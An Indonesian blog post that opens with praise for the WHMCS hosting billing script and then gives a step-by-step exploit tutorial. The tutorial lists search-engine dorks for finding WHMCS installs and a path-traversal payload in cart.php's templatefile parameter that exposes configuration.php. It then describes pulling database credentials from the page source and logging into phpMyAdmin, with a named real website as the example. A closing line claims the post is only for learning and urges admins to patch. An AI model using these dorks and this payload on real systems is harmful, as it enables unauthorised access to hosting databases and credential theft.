WHMCS adalah suatu script yang sekarang paling dipakai oleh
banyak kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah
sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps
maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan
bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti
ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan hampir
komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING
WHMCS ini
Exploit Powered by whmcs
#Keyword Dork :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
2. inurl:billing/cart.php?a=
#Injector :
cart.php?a=test&templatefile=../../../configuration.php
#Contoh [sudah di patch] :
http://www.7m2.net/whmcs/cart.php?
#Tambahkan Injector di belakang cart.php? sehingga
menjadi :
http://target.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
#Selanjutnya klik kanan > View page source
#Cari tulisan yang berwarna hijau seperti gambar di bawah ini :
#Selanjutnya kalian tinggal login di halaman PHPMyAdmin, contoh :
http://www.7m2.net/phpmyadmin
Selesai.
Tutorial ini hanya sebagai pembelajaran saja dan tidak bertujuan untuk merusak system milik siapapun. Dan juga sebagai peringatan kepada Admin WHMCS untuk segera melakukan patch untuk menghindari hal - hal yang tidak diinginkan.
Sumber : Cyber4rt
0 komentar:
Posting Komentar